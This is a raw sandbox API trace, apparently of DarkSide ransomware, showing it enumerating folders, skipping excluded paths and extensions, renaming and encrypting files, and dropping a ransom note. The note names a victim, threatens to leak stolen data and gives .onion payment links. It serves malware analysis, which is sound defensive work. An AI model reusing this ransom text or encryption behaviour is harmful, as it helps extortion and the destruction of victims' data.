_wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.567] wcslen (_String="scr") returned 0x3 [0150.567] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.567] wcslen (_String="shs") returned 0x3 [0150.567] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.567] wcslen (_String="spl") returned 0x3 [0150.567] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.567] wcslen (_String="sys") returned 0x3 [0150.567] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.567] wcslen (_String="theme") returned 0x5 [0150.567] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.567] wcslen (_String="themepack") returned 0x9 [0150.567] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.567] wcslen (_String="wpx") returned 0x3 [0150.567] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.567] wcslen (_String="lock") returned 0x4 [0150.567] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.567] wcslen (_String="key") returned 0x3 [0150.567] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.567] wcslen (_String="hta") returned 0x3 [0150.567] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.567] wcslen (_String="msi") returned 0x3 [0150.567] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.567] wcslen (_String="pdb") returned 0x3 [0150.567] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.567] wcslen (_String="sql") returned 0x3 [0150.567] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.567] wcslen (_String="sqlite") returned 0x6 [0150.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s")) returned 0x10 [0150.568] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0150.568] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" [0150.568] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S") returned 0x57 [0150.568] wcscpy (in: _Dest=0x4560170, _Source="58kutS-VZ_.m4a" | out: _Dest="58kutS-VZ_.m4a") returned="58kutS-VZ_.m4a" [0150.568] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a", dwFileAttributes=0x80) returned 1 [0150.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\58kuts-vz_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0150.568] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.569] ReadFile (in: hFile=0x644, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0150.569] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x2b5e89d1 [0150.569] RtlComputeCrc32 (PartialCrc=0x89d1, Buffer=0x3fe3f4, Length=0x80) returned 0x46ee9981 [0150.569] RtlComputeCrc32 (PartialCrc=0x9981, Buffer=0x3fe3f4, Length=0x80) returned 0x5eeaa937 [0150.569] RtlComputeCrc32 (PartialCrc=0xa937, Buffer=0x3fe3f4, Length=0x80) returned 0x85120988 [0150.569] RtlComputeCrc32 (PartialCrc=0x988, Buffer=0x3fe3f4, Length=0x80) returned 0x79046d4f [0150.569] CloseHandle (hObject=0x644) returned 1 [0150.569] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0150.570] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a" [0150.570] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a") returned 0x66 [0150.570] wcscpy (in: _Dest=0x4570194, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.570] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\58kuts-vz_.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\58kuts-vz_.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\58kutS-VZ_.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\58kuts-vz_.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0150.573] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.574] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x409f0487 [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x985fd48 [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ae2f6b4 [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1168b95c [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d51184e [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d7b7ea2 [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x360410f9 [0150.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x604ef19c [0150.582] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xac1f3700 [0150.582] RtlComputeCrc32 (PartialCrc=0x3700, Buffer=0x2f30094, Length=0x80) returned 0xe657e392 [0150.582] RtlComputeCrc32 (PartialCrc=0xe392, Buffer=0x2f30094, Length=0x80) returned 0x80f0ca4b [0150.582] RtlComputeCrc32 (PartialCrc=0xca4b, Buffer=0x2f30094, Length=0x80) returned 0x7b7c0a41 [0150.582] RtlComputeCrc32 (PartialCrc=0xa41, Buffer=0x2f30094, Length=0x80) returned 0x4e0788bf [0150.582] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.582] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0150.582] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0150.582] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb57c2ff0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0x788ef0f0, ftLastAccessTime.dwHighDateTime=0x1d5e320, ftLastWriteTime.dwLowDateTime=0x788ef0f0, ftLastWriteTime.dwHighDateTime=0x1d5e320, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JZVBOKxj2eLEEdPiA", cAlternateFileName="JZVBOK~1")) returned 1 [0150.582] _wcsicmp (_Str1="$recycle.bin", _Str2="JZVBOKxj2eLEEdPiA") returned -70 [0150.582] wcslen (_String="$recycle.bin") returned 0xc [0150.582] _wcsicmp (_Str1="config.msi", _Str2="JZVBOKxj2eLEEdPiA") returned -7 [0150.582] wcslen (_String="config.msi") returned 0xa [0150.582] _wcsicmp (_Str1="$windows.~bt", _Str2="JZVBOKxj2eLEEdPiA") returned -70 [0150.582] wcslen (_String="$windows.~bt") returned 0xc [0150.582] _wcsicmp (_Str1="$windows.~ws", _Str2="JZVBOKxj2eLEEdPiA") returned -70 [0150.582] wcslen (_String="$windows.~ws") returned 0xc [0150.582] _wcsicmp (_Str1="windows", _Str2="JZVBOKxj2eLEEdPiA") returned 13 [0150.582] wcslen (_String="windows") returned 0x7 [0150.582] _wcsicmp (_Str1="appdata", _Str2="JZVBOKxj2eLEEdPiA") returned -9 [0150.582] wcslen (_String="appdata") returned 0x7 [0150.582] _wcsicmp (_Str1="application data", _Str2="JZVBOKxj2eLEEdPiA") returned -9 [0150.582] wcslen (_String="application data") returned 0x10 [0150.582] _wcsicmp (_Str1="boot", _Str2="JZVBOKxj2eLEEdPiA") returned -8 [0150.582] wcslen (_String="boot") returned 0x4 [0150.582] _wcsicmp (_Str1="google", _Str2="JZVBOKxj2eLEEdPiA") returned -3 [0150.582] wcslen (_String="google") returned 0x6 [0150.582] _wcsicmp (_Str1="mozilla", _Str2="JZVBOKxj2eLEEdPiA") returned 3 [0150.583] wcslen (_String="mozilla") returned 0x7 [0150.583] _wcsicmp (_Str1="program files", _Str2="JZVBOKxj2eLEEdPiA") returned 6 [0150.583] wcslen (_String="program files") returned 0xd [0150.583] _wcsicmp (_Str1="program files (x86)", _Str2="JZVBOKxj2eLEEdPiA") returned 6 [0150.583] wcslen (_String="program files (x86)") returned 0x13 [0150.583] _wcsicmp (_Str1="programdata", _Str2="JZVBOKxj2eLEEdPiA") returned 6 [0150.583] wcslen (_String="programdata") returned 0xb [0150.583] _wcsicmp (_Str1="system volume information", _Str2="JZVBOKxj2eLEEdPiA") returned 9 [0150.583] wcslen (_String="system volume information") returned 0x19 [0150.583] _wcsicmp (_Str1="tor browser", _Str2="JZVBOKxj2eLEEdPiA") returned 10 [0150.583] wcslen (_String="tor browser") returned 0xb [0150.583] _wcsicmp (_Str1="windows.old", _Str2="JZVBOKxj2eLEEdPiA") returned 13 [0150.583] wcslen (_String="windows.old") returned 0xb [0150.583] _wcsicmp (_Str1="intel", _Str2="JZVBOKxj2eLEEdPiA") returned -1 [0150.583] wcslen (_String="intel") returned 0x5 [0150.583] _wcsicmp (_Str1="msocache", _Str2="JZVBOKxj2eLEEdPiA") returned 3 [0150.583] wcslen (_String="msocache") returned 0x8 [0150.583] _wcsicmp (_Str1="perflogs", _Str2="JZVBOKxj2eLEEdPiA") returned 6 [0150.583] wcslen (_String="perflogs") returned 0x8 [0150.583] _wcsicmp (_Str1="x64dbg", _Str2="JZVBOKxj2eLEEdPiA") returned 14 [0150.583] wcslen (_String="x64dbg") returned 0x6 [0150.583] _wcsicmp (_Str1="public", _Str2="JZVBOKxj2eLEEdPiA") returned 6 [0150.583] wcslen (_String="public") returned 0x6 [0150.583] _wcsicmp (_Str1="all users", _Str2="JZVBOKxj2eLEEdPiA") returned -9 [0150.583] wcslen (_String="all users") returned 0x9 [0150.583] _wcsicmp (_Str1="default", _Str2="JZVBOKxj2eLEEdPiA") returned -6 [0150.583] wcslen (_String="default") returned 0x7 [0150.583] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\*" [0150.583] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\*") returned 0x59 [0150.583] wcscpy (in: _Dest=0x4540160, _Source="JZVBOKxj2eLEEdPiA" | out: _Dest="JZVBOKxj2eLEEdPiA") returned="JZVBOKxj2eLEEdPiA" [0150.583] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0150.583] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0150.584] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.584] GetNamedSecurityInfoW () returned 0x0 [0150.585] SetEntriesInAclW () returned 0x0 [0150.585] SetNamedSecurityInfoW () returned 0x0 [0150.593] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58058) returned 1 [0150.593] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe0bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.593] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 1 [0150.593] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.593] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.593] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe08c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe08c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.594] CloseHandle (hObject=0x678) returned 1 [0150.594] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.595] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\") returned="" [0150.595] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\") returned 0x6a [0150.595] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe2ec) returned 0x2db8840 [0150.595] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb57c2ff0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xd8603fc0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8603fc0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.596] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c5ffe0, ftCreationTime.dwHighDateTime=0x1d5db7c, ftLastAccessTime.dwLowDateTime=0x9250d610, ftLastAccessTime.dwHighDateTime=0x1d5d92b, ftLastWriteTime.dwLowDateTime=0x9250d610, ftLastWriteTime.dwHighDateTime=0x1d5d92b, nFileSizeHigh=0x0, nFileSizeLow=0x93dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="16h-.m4a", cAlternateFileName="")) returned 1 [0150.596] _wcsicmp (_Str1="16h-.m4a", _Str2="README.c06622a1.TXT") returned -65 [0150.596] wcsstr (_Str="16h-.m4a", _SubStr="README") returned 0x0 [0150.596] _wcsicmp (_Str1="autorun.inf", _Str2="16h-.m4a") returned 48 [0150.596] wcslen (_String="autorun.inf") returned 0xb [0150.596] _wcsicmp (_Str1="boot.ini", _Str2="16h-.m4a") returned 49 [0150.596] wcslen (_String="boot.ini") returned 0x8 [0150.596] _wcsicmp (_Str1="bootfont.bin", _Str2="16h-.m4a") returned 49 [0150.596] wcslen (_String="bootfont.bin") returned 0xc [0150.596] _wcsicmp (_Str1="bootsect.bak", _Str2="16h-.m4a") returned 49 [0150.596] wcslen (_String="bootsect.bak") returned 0xc [0150.596] _wcsicmp (_Str1="desktop.ini", _Str2="16h-.m4a") returned 51 [0150.596] wcslen (_String="desktop.ini") returned 0xb [0150.596] _wcsicmp (_Str1="iconcache.db", _Str2="16h-.m4a") returned 56 [0150.596] wcslen (_String="iconcache.db") returned 0xc [0150.596] _wcsicmp (_Str1="ntldr", _Str2="16h-.m4a") returned 61 [0150.596] wcslen (_String="ntldr") returned 0x5 [0150.596] _wcsicmp (_Str1="ntuser.dat", _Str2="16h-.m4a") returned 61 [0150.596] wcslen (_String="ntuser.dat") returned 0xa [0150.596] _wcsicmp (_Str1="ntuser.dat.log", _Str2="16h-.m4a") returned 61 [0150.596] wcslen (_String="ntuser.dat.log") returned 0xe [0150.596] _wcsicmp (_Str1="ntuser.ini", _Str2="16h-.m4a") returned 61 [0150.596] wcslen (_String="ntuser.ini") returned 0xa [0150.596] _wcsicmp (_Str1="thumbs.db", _Str2="16h-.m4a") returned 67 [0150.596] wcslen (_String="thumbs.db") returned 0x9 [0150.596] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.596] wcslen (_String="386") returned 0x3 [0150.596] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.596] wcslen (_String="adv") returned 0x3 [0150.596] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.597] wcslen (_String="ani") returned 0x3 [0150.597] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.597] wcslen (_String="bat") returned 0x3 [0150.597] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.597] wcslen (_String="bin") returned 0x3 [0150.597] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.597] wcslen (_String="cab") returned 0x3 [0150.597] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.597] wcslen (_String="cmd") returned 0x3 [0150.597] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.597] wcslen (_String="com") returned 0x3 [0150.597] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.597] wcslen (_String="cpl") returned 0x3 [0150.597] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.597] wcslen (_String="cur") returned 0x3 [0150.597] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.597] wcslen (_String="deskthemepack") returned 0xd [0150.597] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.597] wcslen (_String="diagcab") returned 0x7 [0150.597] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.597] wcslen (_String="diagcfg") returned 0x7 [0150.597] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.597] wcslen (_String="diagpkg") returned 0x7 [0150.597] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.597] wcslen (_String="dll") returned 0x3 [0150.597] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.597] wcslen (_String="drv") returned 0x3 [0150.597] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.597] wcslen (_String="exe") returned 0x3 [0150.597] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.597] wcslen (_String="hlp") returned 0x3 [0150.597] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.597] wcslen (_String="icl") returned 0x3 [0150.597] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.597] wcslen (_String="icns") returned 0x4 [0150.597] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.597] wcslen (_String="ico") returned 0x3 [0150.597] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.598] wcslen (_String="ics") returned 0x3 [0150.598] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.598] wcslen (_String="idx") returned 0x3 [0150.598] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.598] wcslen (_String="ldf") returned 0x3 [0150.598] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.598] wcslen (_String="lnk") returned 0x3 [0150.598] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.598] wcslen (_String="mod") returned 0x3 [0150.598] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.598] wcslen (_String="mpa") returned 0x3 [0150.598] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.598] wcslen (_String="msc") returned 0x3 [0150.598] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.598] wcslen (_String="msp") returned 0x3 [0150.598] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.598] wcslen (_String="msstyles") returned 0x8 [0150.598] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.598] wcslen (_String="msu") returned 0x3 [0150.598] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.598] wcslen (_String="nls") returned 0x3 [0150.598] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.598] wcslen (_String="nomedia") returned 0x7 [0150.598] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.598] wcslen (_String="ocx") returned 0x3 [0150.598] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.598] wcslen (_String="prf") returned 0x3 [0150.598] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.598] wcslen (_String="ps1") returned 0x3 [0150.598] 